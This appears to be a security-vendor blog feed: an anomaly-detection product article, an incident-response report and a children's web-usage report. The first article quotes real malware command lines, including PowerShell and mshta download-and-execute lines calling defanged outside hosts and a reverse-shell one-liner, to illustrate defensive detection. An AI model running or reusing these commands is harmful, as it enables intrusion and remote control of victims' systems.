Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make ​​anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be just false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and which actions employees perform regularly as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, when Adaptive Anomaly Control notifies the IT security manager about suspicious activity, it provides enough context for them to understand whether action needs to be taken immediately. Thus, the technology turns from “the boy who cried wolf” into an advanced version of Little Red Riding Hood, who recognizes the wolf in the guise of her grandmother early on and calls the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process creation actions. For example, the command line code of a new process, file path and name of executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then sets exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which will improve the quality of the training process.

The training period not only avoids false positives, it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to apply the exception to the entire network, but instead configure it for just the particular script that triggered the rule. This mitigates the risk of throwing a global exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.

Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script, the Windows Command Processor, HTML Application Host, or Register Server being started from office software may be considered suspicious. Launching these is technically possible but not typical of regular operation. Let us focus on some real-life examples which the Adaptive Anomaly Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell  -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is the LockiBot’s downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

Adaptive Anomaly Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp%\c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. According to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience: it makes it easy to start PowerShell code and to perform a wide range of actions, such as collecting information about the system.

The number of unique users attacked, by detection group

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt...<SKIPPED LONG BASE64 STRING>...yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Suspicious files inside system directories are also tracked: for example, a ShadowPad backdoor was started from inside a system folder, C:\windows\debug\srv.exe (DLL hijacking was used; DLL MD5: CC2F7D7CA76A5223E936570A076B39B8), and Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at C:\windows\system\explorer.exe (MD5: 8E0B4BC934519400B872F9BAD8D2E9C6). The Mirai botnet also places its components in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).
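To make the four rule groups, the per-group policies and the script-scoped exceptions described above concrete, here is an added example of my own; it is not Kaspersky's code and not how the product is implemented. It evaluates constructed process-creation events (command line, executable path, parent process, user group) against simplified rules for office applications, WMI, script engines and abnormal file locations. The rule names, the event format, the expected system-file locations, the policy groups and the sample command lines are all assumptions for illustration, and the hosts in them use the reserved, non-routable example.invalid domain.

```python
# Added example, not Kaspersky's code: a toy model of rule-based
# process-creation anomaly control with a policy per user group.
# Rule names, the event format, expected system-file locations and the
# sample events are constructed; URLs use the non-routable example.invalid.
import ntpath
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set


@dataclass(frozen=True)
class ProcessEvent:
    user_group: str   # policy group of the logged-on user
    parent: str       # image name of the process that spawned the new one
    image: str        # full path of the new process
    cmdline: str      # command line of the new process


@dataclass
class Rule:
    name: str
    group: str        # office / wmi / script / abnormal
    match: Callable[[ProcessEvent], bool]


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "regsvr32.exe",
                "wscript.exe", "cscript.exe"}
# Where a system binary is expected to live (assumed, simplified).
EXPECTED_LOCATION = {"explorer.exe": {r"c:\windows\explorer.exe"}}
# Indicators of dynamic or obfuscated code in a script-engine command line;
# two or more of them together count as an anomaly.
DYNAMIC_CODE = [
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"downloadstring|frombase64string|decompress", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    re.compile(r"vbscript:getobject", re.I),
]


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


RULES: List[Rule] = [
    Rule("office_starts_script_host", "office",
         lambda e: e.parent.lower() in OFFICE_APPS
         and image_name(e.image) in SCRIPT_HOSTS),
    Rule("wmi_starts_script_host", "wmi",
         lambda e: e.parent.lower() == "wmiprvse.exe"
         and image_name(e.image) in SCRIPT_HOSTS),
    Rule("script_engine_dynamic_code", "script",
         lambda e: image_name(e.image) in {"powershell.exe", "mshta.exe"}
         and sum(bool(p.search(e.cmdline)) for p in DYNAMIC_CODE) >= 2),
    Rule("system_name_outside_expected_location", "abnormal",
         lambda e: image_name(e.image) in EXPECTED_LOCATION
         and e.image.lower() not in EXPECTED_LOCATION[image_name(e.image)]),
]


@dataclass
class Policy:
    disabled_rules: Set[str] = field(default_factory=set)
    # rule name -> command-line patterns accepted as a normal workflow
    exceptions: Dict[str, List[str]] = field(default_factory=dict)


def evaluate(event: ProcessEvent, policies: Dict[str, Policy]) -> List[str]:
    """Names of the rules the event violates under its group's policy."""
    policy = policies.get(event.user_group, Policy())
    hits = []
    for rule in RULES:
        if rule.name in policy.disabled_rules or not rule.match(event):
            continue
        if any(re.search(p, event.cmdline, re.I)
               for p in policy.exceptions.get(rule.name, [])):
            continue   # exception scoped to one script, not the whole rule
        hits.append(rule.name)
    return hits


POLICIES = {
    # developers legitimately run dynamic PowerShell, so that rule is off
    "developers": Policy(disabled_rules={"script_engine_dynamic_code"}),
    # administrators run one inventory script via WMI; only it is excepted
    "it_admins": Policy(exceptions={"wmi_starts_script_host": [r"Get-Inventory\.ps1"]}),
    "finance": Policy(),
}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [   # constructed, patterned after the cases in the text
    ProcessEvent("finance", "winword.exe", PS,
                 "powershell -C IEX((new-object net.webclient).downloadstring('http://example.invalid/fonts.txt'))"),
    ProcessEvent("developers", "explorer.exe", PS,
                 "powershell -NoP -W Hidden -C iex([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('QQ==')))"),
    ProcessEvent("it_admins", "wmiprvse.exe", PS, r"powershell -File C:\Scripts\Get-Inventory.ps1"),
    ProcessEvent("finance", "wmiprvse.exe", r"C:\Windows\System32\mshta.exe",
                 'mshta.exe vbscript:GetObject("script:http://example.invalid/r1.txt")(window.close)'),
    ProcessEvent("finance", "services.exe", r"C:\windows\system\explorer.exe", "explorer.exe"),
]


def run_samples() -> List[List[str]]:
    """Verdict list per sample event, in order."""
    return [evaluate(e, POLICIES) for e in SAMPLE_EVENTS]
```

The same inventory script fires the WMI rule for any group that lacks the exception, which is the point of scoping an exception to one script rather than disabling the rule; and the developer event that is silently allowed would raise the script-engine rule for a finance user, reflecting the per-group policies the text describes.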

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how decisions are made based on what happened during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule suspicious and block them. If a rule was triggered, an administrator receives a report and decides what the technology should do: block the process, or allow it and notify the user. Another option is to extend the training to monitor further how the rule is working. If the user does not take any action, the control continues to work in smart training mode, and the training mode time limit is then reset.
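The per-rule decision process just described, as an added example that models it as a small state machine; this is my own illustration, not Kaspersky's code. The two-week training window, the state and action names and the constructed timeline in `demo()` are assumptions.

```python
# Added example, not Kaspersky's code: a toy model of the per-rule
# training-then-enforcement decision process. The two-week window,
# the state names and the action strings are assumptions.
from collections import Counter
from datetime import datetime, timedelta
from enum import Enum


class RuleState(Enum):
    TRAINING = "training"            # collecting statistics, nothing is blocked
    BLOCK = "block"                  # never seen in training: block and notify
    AWAIT_DECISION = "await"         # seen in training: administrator must decide
    ALLOW_NOTIFY = "allow_notify"    # allowed by the administrator, user is notified


TRAINING_WINDOW = timedelta(days=14)   # assumed length of the training period


class AdaptiveControl:
    def __init__(self, rules, start: datetime):
        self.state = {r: RuleState.TRAINING for r in rules}
        self.training_until = {r: start + TRAINING_WINDOW for r in rules}
        self.hits = Counter()          # triggers recorded while training

    def observe(self, rule: str, now: datetime) -> str:
        """Handle one trigger of `rule` at time `now`; return the action taken."""
        if self.state[rule] == RuleState.TRAINING:
            if now < self.training_until[rule]:
                self.hits[rule] += 1
                return "recorded"      # training mode: statistics only
            # Training is over: a rule that never fired becomes blocking,
            # one that did fire is reported for an administrator decision.
            self.state[rule] = (RuleState.AWAIT_DECISION if self.hits[rule]
                                else RuleState.BLOCK)
        if self.state[rule] == RuleState.BLOCK:
            return "blocked_and_reported"
        if self.state[rule] == RuleState.ALLOW_NOTIFY:
            return "allowed_user_notified"
        return "reported_to_admin"     # AWAIT_DECISION: still in smart training

    def admin_decision(self, rule: str, decision: str, now: datetime) -> None:
        """'block', 'allow' (and notify the user) or 'extend' the training."""
        if decision == "block":
            self.state[rule] = RuleState.BLOCK
        elif decision == "allow":
            self.state[rule] = RuleState.ALLOW_NOTIFY
        elif decision == "extend":
            self.state[rule] = RuleState.TRAINING
            self.training_until[rule] = now + TRAINING_WINDOW   # time limit reset
        else:
            raise ValueError(f"unknown decision: {decision}")


def demo():
    """Walk a constructed timeline through the states; returns the actions."""
    start = datetime(2020, 1, 1)
    ctl = AdaptiveControl(["office_starts_script_host", "wmi_starts_script_host"], start)

    def day(n):
        return start + timedelta(days=n)

    actions = [ctl.observe("office_starts_script_host", day(1))]    # recorded
    actions.append(ctl.observe("wmi_starts_script_host", day(15)))  # blocked: never seen
    actions.append(ctl.observe("office_starts_script_host", day(15)))  # seen: reported
    ctl.admin_decision("office_starts_script_host", "extend", day(15))
    actions.append(ctl.observe("office_starts_script_host", day(20)))  # recorded again
    ctl.admin_decision("office_starts_script_host", "allow", day(30))
    actions.append(ctl.observe("office_starts_script_host", day(31)))  # allowed, notified
    return actions
```

Note that the training window is tracked per rule, so extending training for one rule that fired during the baseline does not reopen the window for rules that are already blocking.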

Adaptive Anomaly Control training algorithm

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection. It does so automatically and requires no special administration skills or proactive measures. Note that the technology cannot detect the malware itself, just its delivery to the network, as well as the potentially dangerous actions launched by an insider, or the malicious activity of programs that have the status of “not a virus”. It is always easier to treat the disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures, including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to block most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are freed up to detect the really complex evasive threats. Adaptive Anomaly Control is used for covering this specific risky area and it is effective in this role, while other endpoint technologies have to address their respective areas of expertise. This way, the complete cybersecurity solution will be efficient enough to protect the business from cyberthreats.

Incident Response Analyst Report 2019 https://securelist.com/incident-response-analyst-report-2019/97974/ Thu, 06 Aug 2020 10:00:34 +0000

 Download full report (PDF)

As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.

The insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.

Executive summary

In 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.

Analysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.

Most of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware’s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.

Verticals and industries

Adversaries used a variety of initial vectors to compromise victims’ environments, including exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. The most common were exploitation of unpatched vulnerabilities and malicious emails, followed by brute-force attacks.

In addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.

Although in 70% of cases we started working on incidents on the first day of a request, analysis revealed that the time between a successful attack and its discovery ranges from an average of one day in ransomware incidents to 10 days in cases of financial theft, and up to 122 days in cyber-espionage and data-theft operations.

Recommendations

Based on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:

  • Apply complex password policies
  • Avoid management interfaces exposed to the internet
  • Only allow remote access for necessary external services with multi-factor authentication – with necessary privileges only
  • Regular system audits to identify vulnerable services and misconfigurations
  • Continually tune security tools to avoid false positives
  • Apply powerful audit policy with log retention period of at least six months
  • Monitor and investigate all alerts generated by security tools
  • Patch your publicly available services immediately
  • Enhance your email protection and employee awareness
  • Forbid use of PsExec to simplify security operations
  • Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks
  • Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss
  • Back up your data frequently and on separated infrastructure

 

Reasons for incident response

Significant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).

Organizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.

One of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story “Cities under ransomware siege“.

 

Distribution of reasons for top regions

A suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.

Distribution of reasons for industries

Although different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).

Detection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.

Initial vectors or how adversaries get in

Common initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.

By linking the popular initial compromise vectors with how an incident was detected, we can see that incidents detected through suspicious files mostly originated from malicious emails, while cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks.
Sometimes we act as complementary experts for a primary incident response team from the victim’s organization and have no information on all of their findings, hence the ‘Unknown reasons’ on the charts. Malicious emails are most likely to be detected by a variety of security toolstacks, but that does not show the distribution between 0-day and 1-day vulnerabilities.

The distribution of how long an attack went unnoticed against how an organization was compromised shows that cases that began with vulnerability exploitation on an organization’s network perimeter went unnoticed for longest. Social engineering attacks via email were the most short-lived.

Tools and exploits

30% of all incidents were tied to legitimate tools

In cyberattacks, adversaries use legitimate tools which can’t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.

Most legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.

Let’s weigh those tools based on their occurrence in incidents; we will also see the tactics (MITRE ATT&CK) where they are usually applied.

Exploits

Most of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.

  • MS17-010 (SMB service in Microsoft Windows): remote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc.
  • CVE-2019-0604 (Microsoft SharePoint): remote code execution vulnerability that allows adversaries to execute arbitrary code without authentication in Microsoft SharePoint.
  • CVE-2019-19781 (Citrix Application Delivery Controller and Citrix Gateway): allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure.
  • CVE-2019-0708 (RDP service in Microsoft Windows): remote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service.
  • CVE-2018-7600 (Drupal): remote code execution vulnerability also known as Drupalgeddon2; widely used to install backdoors, web miners and other malware on compromised web servers.
  • CVE-2019-11510 (Pulse Secure SSL VPN): unauthenticated retrieval of VPN server user credentials, giving instant access to the victim organization through a legitimate channel.

Attack duration

For a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary’s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.

Rush (hours or days)
This category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. In some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary’s activity.
Common threat: ransomware infection
Common attack vectors:
  • Downloading of a malicious file by link in email
  • Downloading of a malicious file from infected site
  • Exploitation of vulnerabilities on network perimeter
  • Credentials brute-force attack
Attack duration (median): 1 day
Incident response duration: hours to days

Average (weeks)
This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week.
Common threat: financial theft
Common attack vectors:
  • Downloading a malicious file by link in email
  • Exploitation of vulnerabilities on network perimeter
Attack duration (median): 10 days
Incident response duration: weeks

Long-lasting (months or longer)
Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. Such attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group.
Common threat: cyber-espionage and theft of confidential data
Common attack vectors:
  • Exploitation of vulnerabilities on network perimeter
Attack duration (median): 122 days
Incident response duration: weeks

Operational metrics

False positives rate

False positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn’t have a specialist in threat hunting or they are managed by an external SOC that doesn’t have the full context for an event.

Age of attack

This is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.

How fast we responded

How long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.

How long response took

Distribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.

MITRE ATT&CK tactics and techniques

Conclusion

In 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.

Improved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.

Various tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.

Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.

Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.

Kids on the Web in 2020 https://securelist.com/children-report-2020/97191/ Wed, 03 Jun 2020 10:00:15 +0000

Technology is what is saving us from a complete change in the way of life in a world of a raging pandemic. It keeps the educational process going, relieves the shortage of human communication and helps us to live life as fully as possible given the isolation and social distancing. Many adults, and children too, have come to realize that the computer is not just a means of entertainment, but an important tool for education, communication and personal growth.

In this article, we look at changes that occurred in children’s behavior on the Web over the past year and the pandemic period. The report is based on statistics gathered by Kaspersky Safe Kids, a software solution that protects children from unwanted content on the Internet.

How we collect our statistics

Kaspersky Safe Kids scans the contents of a Web page the child is trying to access. If the site falls into one of fourteen undesirable categories, the module sends an alert to Kaspersky Security Network. No user’s personal information is transmitted and neither is privacy compromised.

We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.
  • Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

Kaspersky Safe Kids filters Web content according to the following categories:

In this article, we will take a closer look at the most-visited categories for the past year. We have combined the less popular ones into a separate category, with their share of alerts marked as “Other”.

Picture of the world

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020

Children around the world have spent increasingly more time watching videos and listening to music. Software, Audio, Video accounted for nearly forty percent of all Safe Kids alerts over the past year. It was followed by Internet Communications with 24.16 percent and Video Games with 15.98 percent. Online stores were fourth in popularity with 11 percent and News was fifth with 5.54 percent.

Interestingly, Job Search sites with 0.89 percent attracted far more interest from teenagers than Adult Content with 0.74 percent.

Kaspersky Safe Kids Windows and macOS alerts distribution by category in June 2019 through May 2020

Windows users spent more time watching videos, gaming and reading news than macOS users. The latter preferred chatting and spent much more time shopping online. That said, Windows users visited adult content more frequently on average during the year.

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020

The pandemic forced kids to study at home, attending classes online, and we have seen how this affected their time at the computer. They less frequently visited gaming sites starting at the beginning of the year, even when compared with the September 2019 low of 16.75 percent: the figure fell to 13.26 percent in May. Meanwhile, Internet Communications showed a slight growth in April exceeding the October 2019 high by 0.85 p.p. to reach 27.51 percent.

Children visited online stores the most in the October of 2019. The category accounted for 16.93 percent of all alerts. The popularity of online shopping has steadily decreased since then, dropping by 7.57 p.p. to 9.3 percent by April, but May saw it rebound slightly. Adult Content grew somewhat (by about 0.5 p.p.) in winter, then returned to the summer 2019 levels (0.49 percent) in May.

The graph shows an abnormal drop in visits to Software, Audio, Video websites in October. The most likely cause is the new macOS version, Catalina, released on October 7. Users who installed the update faced issues with streaming video on YouTube, Netflix, Amazon Prime and many other sites. The issue affected not just the Safari browser, but Google Chrome, Opera and Firefox as well. It was fixed in November, a fact that the statistics reflect.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on macOS in June 2019 through May 2020

Differences across regions, countries and months

Let us take a closer look at the most popular categories by region and by country to see if children’s preferences changed during the pandemic.

Software, audio, video

Software, Audio, Video has remained ahead of Internet Communications in recent years: kids have used Windows and macOS computers for watching videos and listening to music, but switched to mobile devices to chat. The category has retained its popularity even through the lockdown and online studies.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020

According to KSN statistics for the first half of 2020, Software, Audio, Video began to grow worldwide, reaching a peak of 42.47 percent on all platforms by May.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020

We explained the decrease in the category’s share on macOS in the fall and winter by issues stemming from an operating system update. As for the decline among Windows users around the same time, it was offset by increasing interest in other categories of sites, for instance, E-Commerce.

By the end of the reporting period, the share of Software, Audio, Video had increased among Windows users, whereas children using macOS began watching videos less frequently by May.

Kids in South Asia (India, Bangladesh) were most likely to spend their time watching videos and listening to music (46.16 percent). It was followed by Africa with 44.75 percent and the CIS with 43.83 percent.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by region in June 2019 through May 2020

The category had the lowest share in North America (36.20 percent) and Europe (35.94 percent). As we will see below, children in these regions gave preference not only to watching videos, but video games as well.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS by region in June 2019 through May 2020

In Asia and South Asia, children who used macOS were more likely to consume audio and video content than those who used Windows. In other regions, the category’s Windows share was higher than macOS. In the CIS countries, children’s behavior was nearly identical on the two operating systems.

Interestingly, the distribution of countries where the share of Software, Audio, Video was the largest differs slightly from the regional breakdown.

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by country in June 2019 through May 2020

Children in Belarus (50.59 percent), Japan (49.67 percent), Saudi Arabia (49.54 percent) and India (47.66 percent) favored websites that offered video and music over the past year. YouTube was the most popular video streaming service with kids anywhere in the world.

Online communication

Internet Communications predictably peaked at 27.45 percent in April 2020 as the process of switching schoolchildren to distance learning completed in most countries.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020

We observe a pronounced growth from 17.87 percent in June 2019 to 36.63 percent in May 2020 on desktop computers and laptops running macOS. October’s peak was due to a reduction in the share of Software, Audio, Video category following the macOS update.

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020

Internet Communications accounted for an average of 32.76 percent, with 32.17 percent in Latin America and 30.54 percent in the CIS, and the lowest recorded shares being 15.50 percent in Europe and 16.58 percent in Oceania.

Kaspersky Safe Kids alerts distribution for Internet Communications by region in June 2019 through May 2020

Kaspersky Safe Kids alerts distribution for Internet Communications by country, averaged over June 2019 through May 2020

The largest proportions of children using personal computers for internet communication were recorded in Egypt, Kenya, Mexico and Russia. The lowest rates were recorded in Germany, Australia, the UK and Canada.

From the beginning of 2020, the most popular sites in the Internet Communications category were skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com and mail.google.com.

Computer games

Although the share of Video Games alerts showed a downward trend in the first half of 2020, the category ranked third among the most popular website topics.

